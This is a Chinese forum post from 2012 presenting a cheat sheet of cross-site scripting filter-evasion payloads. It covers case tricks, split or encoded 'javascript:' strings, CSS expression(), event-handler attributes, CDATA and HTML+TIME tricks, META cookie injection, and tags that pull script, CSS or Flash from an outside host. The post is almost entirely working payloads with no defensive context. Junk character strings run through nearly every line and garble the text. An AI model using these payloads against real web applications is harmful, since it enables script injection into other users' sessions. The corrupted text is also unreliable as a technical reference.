1. 改变字符大小写- V: g+ w7 t, e W+ |+ F
- S2 N) L; M+ C' o6 g/ e2 _
" P z) J$ ]+ c# ]& F- ]
; \& H5 j; n( g6 i5 j ~' d" k <sCript>alert(‘d’)</scRipT>3 S$ Q C& V1 `6 s# M
$ E4 s! j, s% [+ c2. 利用多加一些其它字符来规避Regular Expression的检查2 F. ]* n8 |: W! v% o+ g+ R7 s; [
2 [+ o" ?5 w m9 J5 e <<script>alert(‘c’)//<</script>
4 S6 X- ]9 f. d6 K+ Y3 r2 m
- u& ]9 p: q5 W; @( F0 R <SCRIPT a=">" SRC="t.js"></SCRIPT>* \: M; u; g$ {1 R8 d
- h5 T H: A& E3 u! [
<SCRIPT =">" SRC="t.js"></SCRIPT>
9 d, c, {( r: y2 A. ^) o
/ ^% i' n h% P! [3 v$ u! P4 Z <SCRIPT a=">" ” SRC="t.js"></SCRIPT>" y. `1 p& i7 D- E( v, M% s% x
! ? s+ K4 e3 J" g5 j6 p6 K <SCRIPT "a=’>’" SRC="t.js"></SCRIPT>
/ p' Z6 ~2 e9 t( S2 \2 h+ `/ i P$ i/ w& L4 w
<SCRIPT a=`>` SRC="t.js"></SCRIPT>; V/ C5 l& s- i4 Z+ B
4 c- j0 K9 K0 I& y& X) E
<SCRIPT a=">’>" SRC="t.js"></SCRIPT>
" k2 s* J5 L+ c! O- ?7 M. x1 `" Q/ {
3. 以其它扩展名取代.js
9 K" N& i4 \7 Z+ g
9 f/ |8 m6 a, _8 I <script src="bad.jpg"></script>
8 t5 ?; V0 ^$ C
7 ^! q8 z5 j4 M3 {: v4. 将Javascript写在CSS档里
% b6 k9 K# `3 Z9 {
: | |) c8 F* [! M6 a <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
# i9 `5 o0 A0 ^2 B; S9 @4 ^; m* R1 d2 Z
example:8 g" w* @% Y& v1 T
0 S! A' X c# I! F+ y. e
body {
, Y) B1 p1 [) K: h' N) L, {) b
" N, E2 R$ |2 \0 d! I& f1 _ background-image: url(‘javascript:alert("XSS");’)9 c& c& s" O+ ?0 E) t7 z, Z5 ^
! b% k) l1 I8 _/ t* b }
1 k. ^9 s+ J; g$ k. \, d2 ]) Q+ M) x% d3 y4 m/ P+ ?$ e
5. 在script的tag里加入一些其它字符1 C$ |7 i) O& B3 ]2 H
- u, D" Y" ~- R7 _/ T- m. T
<SCRIPT/SRC="t.js"></SCRIPT>
& u& q1 t' z- i0 J4 U% a! ^
- @9 L# h$ X. [4 e <SCRIPT/anyword SRC="t.js"></SCRIPT>
- Z0 I, B# H' N1 k
/ d+ ], V4 i- r9 R1 n6. 使用tab或是new line来规避
& A1 p$ U9 g5 A. S
( U0 U' B. n0 i; r5 R! a. ] P4 z <img src="jav ascr ipt:alert(‘XSS3′)">* h5 Y% l$ Y) B/ D7 l e
. t# r3 R. t2 ` <img src="jav ascr ipt:alert(‘XSS3′)">3 p) a+ b i2 a% f. o! s% s
$ g0 u' C3 r$ x6 d- W( U
<IMG SRC="jav ascript:alert(‘XSS’);">. {. K8 C4 T0 A8 {# K
. O6 o3 N. l8 W -> tag' C$ L4 D* q; Z% q/ s# z$ F
9 z6 f6 W1 e. J3 |
-> new line
# g7 @) u% h! S0 Q$ B* }, H
4 W" g8 g% D0 J7 k2 ^8 a# ^0 K. X7. 使用"\"来规避
2 c* l* S/ T* ]% a- [9 I; I" k0 P; N( F- Y
<STYLE>@im\port’\ja\vasc\ript:alert("XSS32")’;</STYLE>
0 A2 Z: j1 D5 N( B2 e
; u" Q$ i# q" G0 X* P; x- {4 F <IMG STYLE=’xss:expre\ssion(alert("XSS33"))’>
& V/ N0 d& h; m9 T. G* ~. D% S6 `; l6 J9 i8 p$ m4 T. g
<IMG STYLE="xss:expr/*anyword*/ession(alert(‘sss’))">
9 R7 |- o5 ~5 k- C) {
; @# a5 w- E* U3 w" k) M <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
9 H# G7 U/ |& J) i6 r. ?
9 a9 N6 z% e1 r# h, L <A STYLE=’no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))’>& a7 u( d* J0 x! A: J* ?4 I7 M5 ?
% E; b- Q( X! Y! w8. 使用Hex encode来规避(也可能会把";"拿掉)
f8 L; \/ U0 l4 o5 G
: R' o6 Q; N; g <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
j: [7 w3 E% m, m% B' w
. @! C$ u$ ? r9 v6 X 原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
/ t/ Y2 u4 w1 p- @; g. f+ e0 G! K& C( `) X
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
. ?# s% P7 q! m; c1 x8 K5 W( x7 _4 ~( T# [$ j' w% y
原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
; |) i) K' y* k/ k9 C: z) Y
* m2 `; a0 x% ^- y9. script in HTML tag
8 s* v4 Z% D% D \7 B9 t* y( o4 t3 y1 \. ?$ L
<body onload=」alert(‘onload’)」>$ B* E# f" X/ Z3 G3 W
0 e1 ~2 H/ a% y onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload, W4 L3 f+ m/ \ N! O$ d* V) g1 B
" `/ b p! y2 G# X: \) v2 Y
10. 在swf里含有xss的code
L+ o' ?& B, y! i& j
3 x. {: d0 t- b- x <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>2 Y% v+ P0 i6 E* ]! _
0 M9 X$ Z2 U) ^4 }% [6 q11. 利用CDATA将xss的code拆开,再组合起来。
. ~: x+ _- ?; P; f1 c
( g* r' P: t) J) _) G( Y+ c' W6 ` <XML ID=I><X><C>
2 q4 B! o# I2 J+ s, Q
7 @" s9 f6 r' e' h0 P! Z" f7 o+ j <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
8 L" Z! `* ^* m( f4 j
0 f3 w2 p9 ?+ M# W/ g </C></X>
8 E( V: s! N: J6 M
- U: K) I( X: E; S </xml>
6 L7 l' i) z9 D' c( g: w Z' I c, a8 y
4 J4 W. v9 n/ q" S1 B5 x <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
2 p1 {, d3 H7 A) o. Z+ m1 g Y5 _4 P( \+ ^3 p H, g6 S9 T: w( L
<XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>* c0 }9 \$ g. I# ]
% m( K o" K7 [
<SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>1 ]/ {; j0 S: S, p. \3 P& @
7 b7 x6 m: _4 i# b! |# `12. 利用HTML+TIME。( G) m) h9 b! `4 `( t
, q/ Z9 a* x. \0 u* ` <HTML><BODY>, c/ y7 M# D# S. ]0 q6 R) p
$ k% ^# {; ?6 N1 D; C. j
<?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
5 G% p9 \& y1 f. b2 G, ~# Y* t1 U X, ^/ @! D, b) F
<?import namespace="t" implementation="#default#time2">) b% a( ]5 Q- U* g
! H/ @7 x3 `- l4 m# |8 S1 R. A+ U
<t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">+ [ k; M' C/ F6 x! u! X( \& q2 |! i7 i
( {' H' v, D2 i$ S( o </BODY></HTML>
5 O" c. a5 ^; q* W3 X5 |" n/ A2 A& v1 G3 l
13. 透过META写入Cookie。% }0 b& F* x, ~2 g. n/ T
$ b+ r9 Y3 S3 W* b W+ Y <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">% I. M8 ?+ `4 u8 [- A, m7 @
3 t6 @4 D: E) A
14. javascript in src , href , url
# _. \) k/ C$ m
$ Z& N9 K/ B+ W$ _. r$ w <IFRAME SRC=javascript:alert(’13′)></IFRAME>/ D3 S" D* e0 x4 ?* a' I5 [3 G
0 |0 o; \; Q0 I' R+ a
<img src="javascript:alert(‘XSS3′)">
7 A* d4 @" d6 M. N8 I
. i& k- F& t9 j" {2 X0 c, R<IMG DYNSRC="javascript:alert(‘XSS20′)">' h' a. M' K, k; z
) X6 u* |* o" o& M. j/ v, }9 @9 w <IMG LOWSRC="javascript:alert(‘XSS21′)">& ~ m! a6 r! o1 k( U0 V; U8 W4 v
. I1 _' J- a; [% w' c) j" O
<LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
" E# B% I, n, _$ _& Y4 c N- f* j# }5 l4 y, x
<IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>! I8 ]) K6 u: h) x
- v1 r( k1 j1 [2 Z( ]$ l! [. U
<TABLE BACKGROUND="javascript:alert(‘XSS29′)">
1 _& }) D5 ?9 |' f, A( a9 P
4 C: H! T( ?* ~ <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">
) `; P1 m$ Q; n3 F/ Y |/ W
1 H+ a. b: G+ F; ]% _2 d: q7 Q$ ] <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
! F. q) x L. }6 q9 b3 b+ @* p
* u" Q. s6 Q) j/ c2 [; \' | </STYLE><A CLASS=XSS></A>
& f$ r( ^- h: K! e; w6 t5 x
. z6 w" m/ F9 y8 @. ^$ h <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>8 Y, s, X) w w8 I" M' v; q7 x
G4 l! ^. v& T# M) t |
发表于 2012-12-31 09:59:28
收藏
支持
反对